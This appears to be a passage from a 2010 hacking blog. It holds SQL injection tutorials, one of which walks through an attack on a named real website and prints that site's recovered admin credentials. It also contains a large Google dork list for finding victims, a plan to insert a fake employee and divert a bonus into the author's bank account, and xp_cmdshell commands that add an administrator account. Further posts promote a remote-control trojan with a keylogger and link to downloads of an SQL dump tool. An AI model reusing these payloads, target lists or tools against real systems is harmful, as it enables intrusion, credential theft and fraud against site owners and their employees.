6 NULL TRUE 0


Now based on this information the query

SELECT Text, ACTIVE, GROUP FROM TBLDEMO;

Should produce the following results:
First Result TRUE 0
Second Result FALSE 54
Third Result TRUE 54
Fourth Result FALSE 36
RAMBO FALSE 1
TRUE 0

Notice how "NULL" is not displayed at all...
This is because a NULL value literally means nothing.
0 is an actual value, it means 1 less than 1 and 1 more than -1.
This is a very very important difference to understand, since some columns are set to accept NULL values, while others don't!


SELECT TEXT from TBLDEMO where Active = TRUE;

First Result
Third Result

These are all the values for the column text WHERE the "ACTIVE" column has a value equal to TRUE.

SELECT TEXT from TBLDEMO where Active <> False;
Would produce the same result as in the example above.

Got it? It's a lot like playing battleship, one player calls A4, based on the data in front of the other player a response of either "miss" or "hit" is generated. It's not always that easy though, SQL queries can become very very complicated, this is the absolute basics.

-------------------------------------------------------------------
Section 2 - Gathering the Information
-------------------------------------------------------------------

Finding a point of reference

Carrying on from http://localhost/news/display.asp?id=75'

Unclosed quotation mark after the character string ''.

An educated guess would tell me that ID in the query string is used a sql query which goes something like this:

SELECT title, author, description, synopsis, date FROM tblwhichcontainsNewsItems WHERE ID = X

Where X is replaced with the value from the URL,

Which means if I do this http://localhost/news/display.asp?id=75+HAVING 1=1--

Column 'NEWS.NewsID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

So what exactly did I achieve there?
That, 'NEWS.NewsID' is the first column in the table NEWS

So by adding GROUP BY NEWSID(http://localhost/news/display.asp?id=75+GROUP+BY+NEWSID+HAVING 1=1--)

I receive a new error message and you guessed it, the second column in the NEWS table is given to me.

-------------------------------------------------------------------

Section 3 - Moving the point of reference

-------------------------------------------------------------------

Well that's great, but I doubt we'll be able to get anything remotely exciting in the news table, to be honest I'd rather watch Season 4 of House with commentary than stare at the info for a bunch of news articles, so what we need to do next is find other tables contained in the Database. Now we know the site has a sql injection vulnerability and we were already able to find the complete structure of one table, so by amending the sql query a bit, it spits out the info we need...


So from here I try the query UNION SELECT name FROM sys objects...

But now I get an error message, why?

Each SQL statement within the UNION query must have the same number of fields in the result sets with similar data types.

This is translated a bit from the original error message for a bit more clarity, I need to UNION with the same number of columns and these columns MUST match the same data types...

Let's take a closer look at this based on the previous example:


TBLDEMO

ID TEXT ACTIVE GROUP
1 First Result TRUE 0
2 Second Result FALSE 54
3 Third Result TRUE 54
4 Fourth Result FALSE 36
5 RAMBO FALSE 1
6 NULL TRUE 0

TBLUNION

ID TEXT UserID Username Password
1 First Result TRUE john john
2 Second Result FALSE mike mike
3 Third Result TRUE Larry Larry
4 Fourth Result FALSE Natasha Natasha
5 RAMBO FALSE Bruce Bruce
6 NULL TRUE Chuck Chuck




So let's take the SQL query from the first example and add a union query to it:


SELECT Text, ACTIVE, GROUP FROM TBLDEMO WHERE ID = X UNION SELECT Username,Password FROM TBLUNION

So the first problem is that the first part of the query select 3 columns whilst the second part only select 2...

We'll need to amend this so both "sides" of the union query select the same number of results

SELECT Text, ACTIVE, GROUP FROM TBLDEMO WHERE ID = X UNION SELECT Username,Password,UserID FROM TBLUNION

Now a new error, "Cannot convert...whatever"

This is where data types comes into play,

Compare the columns like so:

TEXT USERNAME
ACTIVE PASSWORD
GROUP USERID

If these columns are rewritten to display the type of data it can take it should like something like this:

String String (Correct)
Boolean String (Wrong)
Integer Integer (Correct)

So we should rewrite the query so the statements are the same in

1) NUMBER
2) DATA TYPE

So what happens when a query select 7 columns but the table your trying to read from only has 3?

Use the same column more than once...

UNION SELECT TEXT,TEXT,TEXT,TEXT,TEXT,TEXT,TEXT FROM TBLDEMO;

This is a perfectly valid SQL query, it will display the same info 7 times, but sometimes that's the easiest way to extract the information.


Getting table names, continued...

So from here let's carry on with the previous query and extract table names from the application.

UNION SELECT name,name,name,name FROM sys objects.

The page loads just fine when this UNION statement is added and the info isn't displayed anywhere on the page...
Now we'll have to generate an error to get the info we require, this can be done in the same fashion as when extracting column names Having 1=1 and GROUP BY

UNION SELECT name,name,name,name FROM sys objects HAVING 1 = 1

-------------------------------------------------------------------
Section 4 - In Closing

-------------------------------------------------------------------

Now we receive the first table in the database, we could go on with GROUP BY and comma separate each result, but most web server only process requests up to that many characters then you start seeing 404 errors (Page not found)

Most of your first results should be system tables, you can exclude these tables by adding where type = 'U'
This will force the SQL query to only bring back results where the table was created by a user ie. NOT the default system tables...


Carrying on like this (Yes I know it can be time consuming) you should be able to see each table in the database, if there are so many tables that you can't carry on and system tables are already excluded, look into the statement
WHERE name NOT LIKE '%sometext%' I'm not going to go into detail on this since it is quite rare.


So while digging I discovered the following interesting tables and the row's values in each table:


Table name + column name Value returned
Competition.CompetitionID 1
Competition.Name Apr-08
Competition.bankNo ######
Competition.Outstanding TRUE
Competition.basevalue 4000
Competition.competition Employee of the month
Competition.Winner John Doe
Competition.WinnerID 34
Competition.TransactionStatus Pending

Table name + column name Value returned

Employees.ID 1
Employees.Name Bill
Employees.Surname Gates
Employees.Email bill@gmail.com
Employee.Department Management
Employees.DepartmentBuildingID 1
Employees.Branch Head Office
Employees.Salary MASKED (some insane value)
Empluyees.JobTitle CEO
Employees.BankAccountNr 11111111
Employees.BankAccountName General Savings
Employees.BankAccountCode 1534
Employees.LeaveDue 98
Employees.Phone Number 555-555 55
Employees.CellNumber 065 5452 54111
Employees.Address Some address

So from this information I can deduce that there is a bonus paid to the employee of the month, so I wonder, what would happen if I create a new employee on the system, rig the database to pay the bonus to that employee and set up the bank account for this new employee as my own?

The short answer: Unless you're really good with making money and people disappear, you'd get caught, which is something I'm not covering in this tutorial :)

So anyway, by running a INSERT INTO Employees values [the values] statement and running this same statement on the Competition table, I should receive a large little bonus next month.

I've explained the very basics of gathering the information required. Making changes in the DB, that's up to you, I've never been a fan of "here you go, now your an elite h4x0r" because it really makes script kiddies think they know everything.


-------------------------------------------------------------------
Section 5 - Going further
-------------------------------------------------------------------

This guide was written as a very basic introduction for those who are just starting out, but for those of who you are a bit further than getting names and data, I still wanted to include a few things so you too can gain from this article, I suggest you take a look at the following procedures:

1) Xp_cmdshell `net user foo bar /ADD' Xp_cmdshell `net localgroup /ADD Administrators foo

2)sp_makewebtask (Probably my all time favorite since so many sys admins block CMDShell and not Makewebtask)

3) XP_RegRead & XP_RegWrite
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]Remove Formatting from selection

(Note if a hardware firewall is preventing the connection, this trick will not work) 

........... .................................................................................................................................................................................................

Monday 13 September 2010

SQL Injection Step By Step

-------------------------------------------------------
o. Finding a victim:
-------------------------------------------------------


In order to find vulnerable sites you can use the following search dorks. This is a list of dorks you can use to find potentially vulnerable sites.
But to make the tutorial easier to follow we will use the page
http://www.rfidupdate.com/articles/index.php?id=-15634.

Code:-

inurl:aboutbook.php?id=
inurl:age.php?file=
inurl:age.php?id=
inurl:ageid=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:art.php?idm=
inurl:articipant.php?id=
inurl:article.php?ID=
inurl:artikelinfo.php?id=
inurl:avd_start.php?avd=
inurl:band_info.php?id=
inurl:buy.php?category=
inurl:category.php?id=
inurl:channel_id=
inurl:chappies.php?id=
inurl:clanek.php4?id=
inurl:clubpage.php?id=
inurl:collectionitem.php?id=
inurl:communique_detail.php?id=
inurl:curriculum.php?id=
inurl:declaration_more.php?decl_id=
inurl:detail.php?ID=
inurl:download.php?id=
inurl:downloads_info.php?id=
inurl:erson.php?id=
inurl:event.php?id=
inurl:faq2.php?id=
inurl:fellows.php?id=
inurl:ffer.php?idf=
inurl:fiche_spectacle.php?id=
inurl:forum_bds.php?num=
inurl:galeri_info.php?l=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:games.php?id=
inurl:historialeer.php?num=
inurl:hosting_info.php?id=
inurl:humor.php?id=
inurl:index.php?=
inurl:index.php?id=
inurl:index2.php?option=
inurl:iniziativa.php?in=
inurl:item_id=
inurl:kategorie.php4?id=
inurl:labels.php?id=
inurl:lay_old.php?id=
inurl:loadpsb.php?id=
inurl:look.php?ID=
inurl:main.php?id=
inurl:material.php?id=
inurl:memberInfo.php?id=
inurl:news.php?id=
inurl:news_display.php?getid=
inurl:news_view.php?id=
inurl:newscat.php?id=
inurl:newsDetail.php?id=
inurl:news-full.php?id=
inurl:newsid=
inurl:newsitem.php?num=
inurl:newsone.php?id=
inurl:newsticker_info.php?idn=
inurl:offer.php?idf=
inurl:op.php?id=
inurl:opinions.php?id=
inurl:ost.php?id=
inurl:page.php?file=
inurl:page.php?id=
inurl:Pageid=
inurl:pages.php?id=
inurl:participant.php?id=
inurl:person.php?id=
inurl:pinions.php?id=
inurl:play_old.php?id=
inurl:pop.php?id=
inurl:post.php?id=
inurl:preview.php?id=
inurl:prod_detail.php?id=
inurl:prod_info.php?id=
inurl:product.php?id=
inurl:product_ranges_view.php?ID=
inurl:productdetail.php?id=
inurl:productinfo.php?id=
inurl:product-item.php?id=
inurl:produit.php?id=
inurl:profile_view.php?id=
inurl:publications.php?id=
inurl:ray.php?id=
inurl:read.php?id=
inurl:readnews.php?id=
inurl:reagir.php?num=
inurl:releases.php?id=
inurl:review.php?id=
inurl:rod_info.php?id=
inurl:roduct.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:roductdetail.php?id=
inurl:roductinfo.php?id=
inurl:roduct-item.php?id=
inurl:roduit.php?id=
inurl:rofile_view.php?id=
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurl:rubrika.php?idr=
inurl:section.php?id=
inurl:select_biblio.php?id=
inurl:sem.php3?id=
inurl:shop.php?do=part&id=
inurl:shop_category.php?id=
inurl:shopping.php?id=
inurl:show.php?id=
inurl:show_an.php?id=
inurl:showimg.php?id=
inurl:shredder-categories.php?id=
inurl:spr.php?id=
inurl:sql.php?id=
inurl:staff_id=
inurl:story.php?id=
inurl:sw_comment.php?id=
inurl:tekst.php?idt=
inurl:theme.php?id=
inurl:title.php?id=
inurl:top10.php?cat=
inurl:tradeCategory.php?id=
inurl:trainers.php?id=
inurl:transcript.php?id=
inurl:tray-Questions-View.php?num=
inurl:ublications.php?id=
inurl:view.php?id=
inurl:view_faq.php?id=
inurl:view_product.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:viewshowdetail.php?id=
inurl:website.php?id=
inurlrod_detail.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
For a longer dork list you can download this file.

This is a huge dorklist that i compiled by using

http://www.filefront.com/14257397/DorksForSQLi.txt/

(2000+ google dorks for SQLi)
-------------------------------------------------------
1. Checking if the site is vulnerable to SQL Injection
-------------------------------------------------------

Now you add a ' to the url. Lets say our target page is

http://www.rfidupdate.com/articles/index.php?id=-15634


than you try

http://www.rfidupdate.com/articles/index.php?id=-15634'

If nothing happens and the page just loads up normal, than the site is not vulnerable to this method.
But if an error appears, then it is vulnerable to our method.
The error should look like this.

Code:
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 10
-------------------------------------------------------
2. Finding the number of columns
-------------------------------------------------------
To finde the number of columns, we add "order by x" to the original site url and start for example on x = 1 and increment the x by one
or if you like with bigger stepps.

Code:
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 1 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 2 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 3 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 4 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 5 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 6 ==> No error
.
.
.
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 15 ==> No error
http://www.rfidupdate.com/articles/index.php?id=-15634 order by 16 ==> Error

This reveals that there are 15 columns, cause "order by 16" was followed by an error.
-------------------------------------------------------
3. Which colume is vulnerable
-------------------------------------------------------
With order by we found that there are a total of 15 columns. We now use the
"union all select" command + all the columns seperated by a "," + "--"

For our example we get ...
Code:
http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --

We get 3 and 7 as vulnarable columnes.


-------------------------------------------------------
4. Finding the SQL version from this site
-------------------------------------------------------
For this purpose we choose one from our vulnerable columns and replace it with "@@version", in order to
get the SQL version.


Code:
http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15

We could have also replaced "7" with "@@version". And we will now see the site but now the Colume which we replaced by
"@@version" is now replaced by the SQL version "5.0.67-community".
If the version would be 4 or less you would have to follow another tutorial :(
-------------------------------------------------------
5. Finding the SQL table names
-------------------------------------------------------
In order to find the table names we replace "@@version" with "group_concat(table_name)" and we add
"from information_schema.tables where table_schema=database()--" to the end of the url.

You should have this:

Code:

http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()--

[Code]



The page now displays the talbes
[Code]


ru_Admin,ru_AdvertisementCategories,ru_AdvertisementCategoriesOwners,ru_AdvertisementCategoriesOwnersHistory,
ru_AdvertisementChannels,ru_AdvertisementChannelsHistory,ru_AdvertisementListings,ru_AdvertisementListingsHistory,
ru_AdvertisementPremiums,ru_AdvertisementPremiumsHistory,ru_AdvertisingRequests,ru_AntiSpamQuestions,ru_ArticleCategor

The most interesting here is "ru_Admin", because this seems to be the administrator.
-------------------------------------------------------
5. Finding two other columnes(Username and Password)
-------------------------------------------------------
Now we are going to find the columns which are important for finding the admin password.
We have to change "group_concat(table_name)" to "group_concat(column_name)" and
"from information_schema.tables where table_schema=database()--" to
"from information_schema.column where table_schema=database()--"

We get the following:

Code:
http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database()--


The Site loads some new tables again, but we are only interested in the first two columns cause they contain
username and password from admin.

Code:


ru_Admin_Username,ru_Admin_Password,ru_AdvertisementCategories_ID,ru_AdvertisementCategories_Name,
ru_AdvertisementCategories_Enabled,ru_AdvertisementCategories_Priority,ru_AdvertisementCategoriesOwners_ID,
ru_AdvertisementCategoriesOwners_Enabled,ru_AdvertisementCategoriesOwners_Created,
ru_AdvertisementCategoriesOwners_LastUpdated,ru_Advert
-------------------------------------------------------
6. Finding admin username and password
-------------------------------------------------------
In order to get the username and the password we again change the URL.
1. "group_concat(columns_name)" to "group_concat(ru_Admin_Username,0x3a,ru_Admin_Password)"
2. "from information_schema.columns where table_schema=database()--" to "from ru_Admin--"

So our Url looks like this(Important: When pasting the URL you browser may add some crap in front of the 13, which should be deleted in order to get the URL working^^):

Code:

http://www.rfidupdate.com/articles/index.php?id=-1563 union all select 1,2,group_concat(ru_Admin_Username,0x3a,ru_Admin_Password),4,5,6,7,8,9,10,11,12, 13,14,15 from ru_Admin--

Look what we get ...
Code:
admin:admRIvuxHahkQ

As you might guess "admin" is the username and "admRIvuxHahkQ" the related password. What we now have to do is to
find the admin login page.

In this example the password was not crypted.
But i want also to explain what you can do if the password is crypted.
-------------------------------------------------------
7. Cracking MD5
-------------------------------------------------------
If the admin was lazy and he used some very easy to crack password, than you might have success with the following
online crack engines:

* http://hashkiller.com/
* http://www.md5this.com/crack-it-/index.php
* http://gdataonline.com/seekhash.php
* http://www.milw0rm.com/cracker/insert.php

For webcracking a Hash, i would advise you to use hashkiller.com as it will use many webcracker to decrypt your Hash.
But you will have to register onto that page. In case you are using Firefox you can also get a cool addon called Bugmenot, just follow the link in my signature for more detail and other helpful addons.

If the admin was not lazy and used a very uncommon password you can use the following applications to bruteforce the hash.


* Cain and Abel--
http://www.oxid.it/cain.html

* MDCrack NG
http://c3rb3r.openwall.net/mdcrack/

here is the good video tutorial -
http://infinityexists.com/videos/episode10/

for the usage of both applications.
WARING: I didn't upload the files and i do not take any responsiblity for them.

-------------------------------------------------------
8. Finding admin login page
-------------------------------------------------------
There are some sites that provide a search engine for admin login pages

http://www.th3-0utl4ws.com/tools/admin-finder/http://mormoroth.net/af/http://4dm1n.houbysoft.com/

And you can also download a program called Admin Page Finder, which is very useful on finding the admin login page.
http://zarabyte.com/dl/adminfinder.rar
WARING: I didn't upload the files and i do not take any responsiblity for them.



Please do not try to deface the site as this would prevent other people to have the chance to follow the tutorial like you did

-----------------------------

firefox addons-
http://www.facebook.com/topic.php?uid=116329035053162&topic=429


enjoy !!!

keep.. rocking ..

team -
WOH ....

Wednesday 8 September 2010

GoodLuck 3.2.0.0. direct connection




-Send and receive messages
-Engage in a two way chat
-Raise a33;Format Drivea33; window
-Receive Total and Available RAM
-Obliterate any running executable
-Print designated text
-Minimize all windows
-Overflow cmd.exe
-Receive server executable up time
-Empty recycle bin
-Send a33;heaps of beepsa33;
-Open designated web page
-Hide / Show icons
-Hide / Show task bar
-Black out / Show screen
-Open / Close tray
-Make icons dance / Stop dance
-Disable / Enable shut down
-Disable / Enable clipboard
-Turn on strobe light/ Turn off strobe light
-Caps On / Off
-Hide / Show system tray
-Hide / Show start menu
-Hide / Show clock
-Log off XP / OS
-Shut down XP / OS
-Restart from XP / OS
-Type and save designated text in notepad
-Commence default screen saver
-Set designated clipboard text
-Add designated text to Control Panel
-Remove text from Control Panel
-Have Microsofta33;s animated character Merlin speak designated text
-Raise the checkdisk executable
-Close the server executable
-Full blown key logger
-Receive OS/XP computer name
-Receive OS/XP user name
-Receive computer up time
-Receive OS type and version
-Receive clipboard text
-Receive all running executables

Oficial Page:

http://www.ssope.net/Tree/GoodLuck_3_Tree.html
........................................................ .....................................................................................................................................................
...........................................................

Hack Websites Easily Video Tutorial With MySQL Dump V.1

Tool Description:
*MySQL Dump is a Remote MySQL dump (SQL Injection)!
Is possible load all data (Databases, tables, columns and data!)

Dependences:
* MS Netframework v.2

Screen Shots:
[Image: 00of0.png]
[Image: 01xw6.png]
[Image: 02px6.png]
[Image: 03nd5.png]

Download Link:
MIRROR 1: http://www.megaupload.com/?d=PTDEC18H
MIRROR 2: http://rapidshare.com/files/173763244/My...1.rar.html


Video
Tutorial Link:
http://www.megaupload.com/?d=P6KAGTGP


Virose Scann:
Report generated: 16.12.2008 at 3.41.14 (GMT 1)
Filename: MySQLDumpv1.exe
File size: 537 KB
MD5 Hash: 59D7B17FAE334C87CB064F56AAC3E469
SHA1 Hash: 7F6B95DC3BFDA0FC7BC59FA8B1D3E44D0F416F48
Packer detected: Microsoft Visual C# / Basic .NET
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 24

Detections
a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

Scan report generated by
NoVirusThanks.org 

..................... ...............................................................................................................................................................................

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More